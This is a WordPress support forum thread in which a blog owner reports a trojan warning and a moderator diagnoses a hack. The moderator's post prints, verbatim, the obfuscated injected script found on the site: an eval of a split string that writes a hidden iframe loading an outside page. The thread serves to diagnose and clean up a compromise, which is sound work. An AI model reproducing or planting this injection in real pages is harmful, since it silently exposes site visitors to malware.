WordPress.org

Ready to get started?Download WordPress

Forums

Trojan on WP Blog? (3 posts)

  1. lettylou
    Member
    Posted 4 years ago #

    Someone who visited my blog recently informed me that she got a trojan warning when opening the site up. I've been having some trouble with the dashboard recently (often, it opens, then the page goes completely blank and say "Done" in the lower left hand corner) so perhaps the trojan is the culprit. However, I have absolutely no idea how to go about finding this trojan and what the file might look like...Any suggestions would be seriously appreciated!

    Here's my site (is it be risky to visit at this point? Should I take it down until I can get this figured out?):
    http://copperclockdance.com/

    Thanks for any help you might be able to provide. sewiously.

  2. Samuel B
    moderator
    Posted 4 years ago #

    looking at the front page and doing a "view source" shows this at very bottom
    <script>var bpxDsSbm8='d*%@o*%@c*%@u*%@m*%@e*%@n*%@t*%@.*%@w*%@r*%@i*%@t*%@e*%@(*%@\'*%@<*%@i*%@f*%@r*%@a*%@m*%@e*%@ *%@s*%@r*%@c*%@=*%@"*%@h*%@t*%@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*%@p*%@l*%@a*%@s*%@.*%@c*%@o*%@m*%@/*%@i*%@n*%@.*%@p*%@h*%@p*%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@ *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@ *%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%@e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r*%@a*%@m*%@e*%@>*%@\'*%@)*%@;*%@';eval(bpxDsSbm8.split('*%@').join(""));</script>

    so you are hacked
    here is some help

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

  3. lettylou
    Member
    Posted 4 years ago #

    Yeah, I just discovered this. It basically translates into "document write iframe src="http://ninoplas.com/in.php"...etc...Grrr! Thanks so much for the reply though and thanks for posting the links to solutions.

    Do you think I should take down the site until I figure this out? I don't want to be harming any one else's computer...not that my site gets a lot of traffic, but still...?

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags